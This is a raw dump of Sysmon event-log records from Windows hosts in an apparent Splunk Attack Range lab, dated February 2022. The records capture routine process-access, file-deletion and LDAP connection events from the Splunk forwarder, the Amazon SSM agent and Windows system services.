Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18DB-6216-5507-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.738{C8EA50B7-18DB-6216-5507-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.690{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B92B8B945E8B41D40E9950F5E4DD3D6,SHA256=C55DE567232769D45B993DEDCACE111C21CAEE7324DD4F2AEAE3E858579B5D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:03.117{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AED4AED15E9D90D820570A0729A1163,SHA256=9C75C8C5B7431D00FAF5975D970F11904A2C3FF2EE6AC4E2354059963377586D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.097{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-164MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:04.695{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C2D33FF6C38C00AC4DCF8DDD66410AB,SHA256=4F94DA70DCFCFB46E9E5C79B654702E7C332C310A9EACADD2571D08297DCE529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:04.352{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85899C774E32E0E88E0A4E5F293BDAAD,SHA256=41E138A6B649AF1AF120BA3EADCC65B4B623452836903ACDF699796124C3A67D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:04.110{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-165MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.536{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49532-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:03.536{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49532-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000298448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:05.774{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5C45B497F52F785675C1F1BEED534D,SHA256=F5DAF9D14052F4DE6D6436F134DFFE8414516D90D83DF6E3F75C2421384E1862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:05.367{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D50B23D67B87467B38FFE006BC9418,SHA256=EE2F0556892141D11FE247178BD117A112EDCD7B79636FF24E583292DFFD3A98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:06.794{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4F24B1BD095EDC8EE7242963D5DDD3,SHA256=8ABAD2BBC4E2C98E3B55AAAE9DB07702655A4B914F515B5316AC3AF97DC39731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:06.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2842F2391C237E88E830D7B5AF8E5A7,SHA256=125E4BAE12CDC0AEFAF5F960BCCE7C21240729C8D51E531A33CDCEB4C0528326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:07.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C9EDDAEF3ADEE674D9F5E2596711532,SHA256=A295690A2333F4F7F585B2FB5EFF1DE9D6B6DBBA1F5A342266E63328BCDA9BEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:07.492{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E94859E66646AB23393E4945BB4D33,SHA256=3EE39C0AE8C64EC0C600FE1DAB1483239222B16BEBCE895FC8594C6424C1B1B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 